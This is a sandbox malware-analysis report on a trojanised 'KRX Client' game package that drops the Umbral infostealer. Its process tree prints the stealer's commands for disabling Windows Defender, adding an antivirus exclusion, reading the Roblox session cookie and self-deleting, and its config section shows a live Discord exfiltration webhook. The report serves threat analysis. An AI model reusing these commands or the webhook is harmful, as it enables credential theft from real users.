Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
3krx/.RUN T...RX.bat
windows7-x64
10krx/.RUN T...RX.bat
windows10-2004-x64
10krx/.crack.ps1
windows7-x64
3krx/.crack.ps1
windows10-2004-x64
7krx/RUN TH...at.lnk
windows7-x64
3krx/RUN TH...at.lnk
windows10-2004-x64
10krx/krx/DD...er.exe
windows7-x64
1krx/krx/DD...er.exe
windows10-2004-x64
1krx/krx/KR...nt.exe
windows7-x64
10krx/krx/KR...nt.exe
windows10-2004-x64
10krx/krx/SDL2.dll
windows7-x64
1krx/krx/SDL2.dll
windows10-2004-x64
1krx/krx/av...61.dll
windows7-x64
1krx/krx/av...61.dll
windows10-2004-x64
1krx/krx/av...61.dll
windows7-x64
1krx/krx/av...61.dll
windows10-2004-x64
1krx/krx/avutil-59.dll
windows7-x64
1krx/krx/avutil-59.dll
windows10-2004-x64
1krx/krx/co...ry.bat
windows7-x64
1krx/krx/co...ry.bat
windows10-2004-x64
1krx/krx/co...ve.exe
windows7-x64
1krx/krx/co...ve.exe
windows10-2004-x64
1krx/krx/co...re.exe
windows7-x64
1krx/krx/co...re.exe
windows10-2004-x64
1krx/krx/da...al.exe
windows7-x64
1krx/krx/da...al.exe
windows10-2004-x64
1krx/krx/dbgcore.dll
windows10-2004-x64
1krx/krx/dbghelp.dll
windows10-2004-x64
1krx/krx/de...at.exe
windows7-x64
1krx/krx/de...at.exe
windows10-2004-x64
1krx/krx/dilate.exe
windows7-x64
1krx/krx/dilate.exe
windows10-2004-x64
1Analysis
-
max time kernel
121s -
max time network
128s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
06/02/2025, 18:49
Static task
static1
Behavioral task
behavioral1
Sample
krx/.RUN THIS SCRIPT TO START KRX.bat
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
krx/.RUN THIS SCRIPT TO START KRX.bat
Resource
win10v2004-20250129-en
Behavioral task
behavioral3
Sample
krx/.crack.ps1
Resource
win7-20240729-en
Behavioral task
behavioral4
Sample
krx/.crack.ps1
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
krx/RUN THIS SCRIPT TO START KRX.bat.lnk
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
krx/RUN THIS SCRIPT TO START KRX.bat.lnk
Resource
win10v2004-20250129-en
Behavioral task
behavioral7
Sample
krx/krx/DDNet-Server.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
krx/krx/DDNet-Server.exe
Resource
win10v2004-20250129-en
Behavioral task
behavioral9
Sample
krx/krx/KRX Client.exe
Resource
win7-20241023-en
Behavioral task
behavioral10
Sample
krx/krx/KRX Client.exe
Resource
win10v2004-20250129-en
Behavioral task
behavioral11
Sample
krx/krx/SDL2.dll
Resource
win7-20240729-en
Behavioral task
behavioral12
Sample
krx/krx/SDL2.dll
Resource
win10v2004-20250129-en
Behavioral task
behavioral13
Sample
krx/krx/avcodec-61.dll
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
krx/krx/avcodec-61.dll
Resource
win10v2004-20250129-en
Behavioral task
behavioral15
Sample
krx/krx/avformat-61.dll
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
krx/krx/avformat-61.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
krx/krx/avutil-59.dll
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
krx/krx/avutil-59.dll
Resource
win10v2004-20250129-en
Behavioral task
behavioral19
Sample
krx/krx/config_directory.bat
Resource
win7-20240903-en
Behavioral task
behavioral20
Sample
krx/krx/config_directory.bat
Resource
win10v2004-20250129-en
Behavioral task
behavioral21
Sample
krx/krx/config_retrieve.exe
Resource
win7-20241023-en
Behavioral task
behavioral22
Sample
krx/krx/config_retrieve.exe
Resource
win10v2004-20250129-en
Behavioral task
behavioral23
Sample
krx/krx/config_store.exe
Resource
win7-20241010-en
Behavioral task
behavioral24
Sample
krx/krx/config_store.exe
Resource
win10v2004-20250129-en
Behavioral task
behavioral25
Sample
krx/krx/data/krx/DDNet_original.exe
Resource
win7-20240729-en
Behavioral task
behavioral26
Sample
krx/krx/data/krx/DDNet_original.exe
Resource
win10v2004-20250129-en
Behavioral task
behavioral27
Sample
krx/krx/dbgcore.dll
Resource
win10v2004-20250129-en
Behavioral task
behavioral28
Sample
krx/krx/dbghelp.dll
Resource
win10v2004-20250129-en
Behavioral task
behavioral29
Sample
krx/krx/demo_extract_chat.exe
Resource
win7-20240903-en
Behavioral task
behavioral30
Sample
krx/krx/demo_extract_chat.exe
Resource
win10v2004-20250129-en
Behavioral task
behavioral31
Sample
krx/krx/dilate.exe
Resource
win7-20240903-en
Behavioral task
behavioral32
Sample
krx/krx/dilate.exe
Resource
win10v2004-20250129-en
General
-
Target
krx/krx/KRX Client.exe
-
Size
13.5MB
-
MD5
14aa5b66b4eb09f2ec43ab2785353b30
-
SHA1
13e604b67db06e15a4f6c320fadb653f35d8bd1a
-
SHA256
83d30f0c1b0fb62ba26d7a2a8ddd0f1d0a355d4011d57c9316fc1fe6fc3e144b
-
SHA512
ae7b132ae3d91e1f7967fffc52c7b30760d4bf29f7c3c25522c27002399c2de865729e99ce7141baa6355ce6e22141721e733bc1ebdacc840f2d3ad112ead39a
-
SSDEEP
196608:1aqDXlWLO5Ui4d+fNcCnpVubF7d2vziaM7G9PEozWpLMFhKxY+MyAD0vOLQpMJKu:1a0eO9kh7EzzKOPEoypIFDWY3tKgO4
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1337020963363225641/h0Ve6Z9WtTbW9d3frLkSaZTzjtjFum8OAq1NnRnHG-Vd0mImdRoT37Xs5_5jhVWlKEdf
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral9/files/0x000c00000001202c-3.dat family_umbral behavioral9/memory/904-10-0x00000000013A0000-0x00000000013E0000-memory.dmp family_umbral -
Umbral family
-
pid Process 2652 powershell.exe 784 powershell.exe 2980 powershell.exe 2728 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Umbral.exe -
Executes dropped EXE 2 IoCs
pid Process 904 Umbral.exe 2300 KRX Client.exe -
Loads dropped DLL 2 IoCs
pid Process 2556 KRX Client.exe 2556 KRX Client.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 9 discord.com 10 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language KRX Client.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 448 cmd.exe 2212 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2928 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2212 PING.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 904 Umbral.exe 2728 powershell.exe 2652 powershell.exe 784 powershell.exe 1816 powershell.exe 2980 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 904 Umbral.exe Token: SeIncreaseQuotaPrivilege 2220 wmic.exe Token: SeSecurityPrivilege 2220 wmic.exe Token: SeTakeOwnershipPrivilege 2220 wmic.exe Token: SeLoadDriverPrivilege 2220 wmic.exe Token: SeSystemProfilePrivilege 2220 wmic.exe Token: SeSystemtimePrivilege 2220 wmic.exe Token: SeProfSingleProcessPrivilege 2220 wmic.exe Token: SeIncBasePriorityPrivilege 2220 wmic.exe Token: SeCreatePagefilePrivilege 2220 wmic.exe Token: SeBackupPrivilege 2220 wmic.exe Token: SeRestorePrivilege 2220 wmic.exe Token: SeShutdownPrivilege 2220 wmic.exe Token: SeDebugPrivilege 2220 wmic.exe Token: SeSystemEnvironmentPrivilege 2220 wmic.exe Token: SeRemoteShutdownPrivilege 2220 wmic.exe Token: SeUndockPrivilege 2220 wmic.exe Token: SeManageVolumePrivilege 2220 wmic.exe Token: 33 2220 wmic.exe Token: 34 2220 wmic.exe Token: 35 2220 wmic.exe Token: SeIncreaseQuotaPrivilege 2220 wmic.exe Token: SeSecurityPrivilege 2220 wmic.exe Token: SeTakeOwnershipPrivilege 2220 wmic.exe Token: SeLoadDriverPrivilege 2220 wmic.exe Token: SeSystemProfilePrivilege 2220 wmic.exe Token: SeSystemtimePrivilege 2220 wmic.exe Token: SeProfSingleProcessPrivilege 2220 wmic.exe Token: SeIncBasePriorityPrivilege 2220 wmic.exe Token: SeCreatePagefilePrivilege 2220 wmic.exe Token: SeBackupPrivilege 2220 wmic.exe Token: SeRestorePrivilege 2220 wmic.exe Token: SeShutdownPrivilege 2220 wmic.exe Token: SeDebugPrivilege 2220 wmic.exe Token: SeSystemEnvironmentPrivilege 2220 wmic.exe Token: SeRemoteShutdownPrivilege 2220 wmic.exe Token: SeUndockPrivilege 2220 wmic.exe Token: SeManageVolumePrivilege 2220 wmic.exe Token: 33 2220 wmic.exe Token: 34 2220 wmic.exe Token: 35 2220 wmic.exe Token: SeDebugPrivilege 2728 powershell.exe Token: SeDebugPrivilege 2652 powershell.exe Token: SeDebugPrivilege 784 powershell.exe Token: SeDebugPrivilege 1816 powershell.exe Token: SeIncreaseQuotaPrivilege 1700 wmic.exe Token: SeSecurityPrivilege 1700 wmic.exe Token: SeTakeOwnershipPrivilege 1700 wmic.exe Token: SeLoadDriverPrivilege 1700 wmic.exe Token: SeSystemProfilePrivilege 1700 wmic.exe Token: SeSystemtimePrivilege 1700 wmic.exe Token: SeProfSingleProcessPrivilege 1700 wmic.exe Token: SeIncBasePriorityPrivilege 1700 wmic.exe Token: SeCreatePagefilePrivilege 1700 wmic.exe Token: SeBackupPrivilege 1700 wmic.exe Token: SeRestorePrivilege 1700 wmic.exe Token: SeShutdownPrivilege 1700 wmic.exe Token: SeDebugPrivilege 1700 wmic.exe Token: SeSystemEnvironmentPrivilege 1700 wmic.exe Token: SeRemoteShutdownPrivilege 1700 wmic.exe Token: SeUndockPrivilege 1700 wmic.exe Token: SeManageVolumePrivilege 1700 wmic.exe Token: 33 1700 wmic.exe Token: 34 1700 wmic.exe -
Suspicious use of WriteProcessMemory 47 IoCs
description pid Process procid_target PID 2556 wrote to memory of 904 2556 KRX Client.exe 30 PID 2556 wrote to memory of 904 2556 KRX Client.exe 30 PID 2556 wrote to memory of 904 2556 KRX Client.exe 30 PID 2556 wrote to memory of 904 2556 KRX Client.exe 30 PID 2556 wrote to memory of 2300 2556 KRX Client.exe 31 PID 2556 wrote to memory of 2300 2556 KRX Client.exe 31 PID 2556 wrote to memory of 2300 2556 KRX Client.exe 31 PID 2556 wrote to memory of 2300 2556 KRX Client.exe 31 PID 904 wrote to memory of 2220 904 Umbral.exe 33 PID 904 wrote to memory of 2220 904 Umbral.exe 33 PID 904 wrote to memory of 2220 904 Umbral.exe 33 PID 904 wrote to memory of 2620 904 Umbral.exe 36 PID 904 wrote to memory of 2620 904 Umbral.exe 36 PID 904 wrote to memory of 2620 904 Umbral.exe 36 PID 904 wrote to memory of 2728 904 Umbral.exe 38 PID 904 wrote to memory of 2728 904 Umbral.exe 38 PID 904 wrote to memory of 2728 904 Umbral.exe 38 PID 904 wrote to memory of 2652 904 Umbral.exe 40 PID 904 wrote to memory of 2652 904 Umbral.exe 40 PID 904 wrote to memory of 2652 904 Umbral.exe 40 PID 904 wrote to memory of 784 904 Umbral.exe 42 PID 904 wrote to memory of 784 904 Umbral.exe 42 PID 904 wrote to memory of 784 904 Umbral.exe 42 PID 904 wrote to memory of 1816 904 Umbral.exe 44 PID 904 wrote to memory of 1816 904 Umbral.exe 44 PID 904 wrote to memory of 1816 904 Umbral.exe 44 PID 904 wrote to memory of 1700 904 Umbral.exe 46 PID 904 wrote to memory of 1700 904 Umbral.exe 46 PID 904 wrote to memory of 1700 904 Umbral.exe 46 PID 904 wrote to memory of 1676 904 Umbral.exe 48 PID 904 wrote to memory of 1676 904 Umbral.exe 48 PID 904 wrote to memory of 1676 904 Umbral.exe 48 PID 904 wrote to memory of 2844 904 Umbral.exe 50 PID 904 wrote to memory of 2844 904 Umbral.exe 50 PID 904 wrote to memory of 2844 904 Umbral.exe 50 PID 904 wrote to memory of 2980 904 Umbral.exe 52 PID 904 wrote to memory of 2980 904 Umbral.exe 52 PID 904 wrote to memory of 2980 904 Umbral.exe 52 PID 904 wrote to memory of 2928 904 Umbral.exe 54 PID 904 wrote to memory of 2928 904 Umbral.exe 54 PID 904 wrote to memory of 2928 904 Umbral.exe 54 PID 904 wrote to memory of 448 904 Umbral.exe 56 PID 904 wrote to memory of 448 904 Umbral.exe 56 PID 904 wrote to memory of 448 904 Umbral.exe 56 PID 448 wrote to memory of 2212 448 cmd.exe 58 PID 448 wrote to memory of 2212 448 cmd.exe 58 PID 448 wrote to memory of 2212 448 cmd.exe 58 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2620 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\krx\krx\KRX Client.exe"C:\Users\Admin\AppData\Local\Temp\krx\krx\KRX Client.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:904 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2220
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"3⤵
- Views/modifies file attributes
PID:2620
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2728
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2652
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:784
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1816
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:1676
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:2844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2980
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:2928
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:448 -
C:\Windows\system32\PING.EXEping localhost4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2212
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\KRX Client.exe"C:\Users\Admin\AppData\Local\Temp\KRX Client.exe"2⤵
- Executes dropped EXE
PID:2300
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5826b9ffb52de4ea363f3dbda5251e9e2
SHA1ba7e9790b1214ddb9a04fdbcae44765b3c066018
SHA2563929b485c8729e1e943ef2bc2b58378508f686100c3dd5b23092a5b63cfa2c76
SHA5129f1b660ac67f380c3bf9425b77630acf52a1754d971c9619d096b14d5ebae91156993586d5dd3814108ccdead6387670eb44413132a3bd68665866da7bc25a6d
-
Filesize
13.4MB
MD57907e9406015ceba49d7f1156f032ac8
SHA1a8034055f4358c1d687b3c2c70c588f37982fa88
SHA256fc59d043ebbf8e3225f399030bc6447a0592e992bcb57a08d769c35934335de3
SHA512bff798c9a2301120c343e7108a857dc2a78e5c18fa5fbc06d71ada65f96adbff3ce47e3ffbf51c13db50f0c09ae6d0bcad4a2abe3911e0bd0b2a1b816c0685a9
-
Filesize
231KB
MD539866481d5925ad5fb5a6c72bc51c3c5
SHA16c646ec853a4178e219c73cd1788d3f51623099d
SHA25638042abd98755c213a6f36e5c79d23e7d09b56495b29daab3e89fcdccde80ad2
SHA512daca18d9d9132ffe07b142a80148aa98575c72052de8bd18115f85adcac1ed8b6f990a85d3076a9c88e934694ae8ba19b58eb6cf81bc27a3c84480c3e853779d